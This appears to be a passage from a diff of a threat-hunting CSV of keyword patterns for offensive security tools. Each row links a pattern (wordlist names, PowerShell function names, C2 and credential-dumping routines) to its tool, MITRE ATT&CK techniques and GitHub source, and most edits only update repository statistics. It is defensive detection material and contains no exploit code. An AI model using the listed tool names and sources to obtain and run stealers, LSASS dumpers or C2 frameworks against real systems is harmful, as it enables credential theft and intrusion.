tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/user.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/vnc_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/windows_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/windows_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*wordlist_TLAs.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--wordlist=*-passwords.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*wordlist-nthash-reversed*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" "*wordlist-probable.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*wordlists*rmg.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*wordlists*rmiscout.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*wordlists/dynamic-all.txt*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*wordlists/fasttrack.txt*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","290","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" -"*wordlists/rockyou.txt'*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*wordlists/subdomains-5000.txt*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" -"*wordlists/top1million.txt*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*wordlists*rmg.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*wordlists*rmiscout.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*wordlists/dynamic-all.txt*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*wordlists/fasttrack.txt*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*wordlists/rockyou.txt'*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*wordlists/subdomains-5000.txt*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*wordlists/top1million.txt*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" "*WorldWind Stealer.zip*","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","10","1","11","3","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z" "*WorldWind-Stealer*","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","10","1","11","3","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z" -"*wpapcap2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*wp-exploitable-plugins.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*wpapcap2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*wp-exploitable-plugins.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*wpscan --api-token *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*WPScan*","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","N/A","Web Attacks","https://github.com/wpscanteam/wpscan","1","1","N/A","N/A","10","7829","1230","2023-10-02T10:48:40Z","2012-07-11T20:27:47Z" +"*WPScan*","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","N/A","Web Attacks","https://github.com/wpscanteam/wpscan","1","1","N/A","N/A","10","7831","1230","2023-10-02T10:48:40Z","2012-07-11T20:27:47Z" "*wrap_execute_assembly*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*wrap_execute_encoded_powershell*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*wrap_get_clipboard*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" @@ -18466,21 +18654,21 @@ "*write_payload_dll_transacted*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*write_what_where.py*","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","242","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" "*WriteAndExecuteShellcode*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" -"*WriteDLLPermission.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Write-HijackDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Write-HijackDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Write-HijackDll*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Write-Output 127.0.0.1:1111*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" +"*WriteDLLPermission.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Write-HijackDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Write-HijackDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Write-HijackDll*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Write-Output 127.0.0.1:1111*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" "*WritePayloadDllTransacted*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*Write-PortscanOut*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Write-ServiceBinary*","offensive_tool_keyword","AD exploitation cheat sheet","Exploit an unquoted service path vulnerability to spawn a beacon","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Write-UserAddMSI*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Write-UserAddMSI*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*ws://localhost:58082*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" -"*wscript_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*WScriptBypassUAC*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by 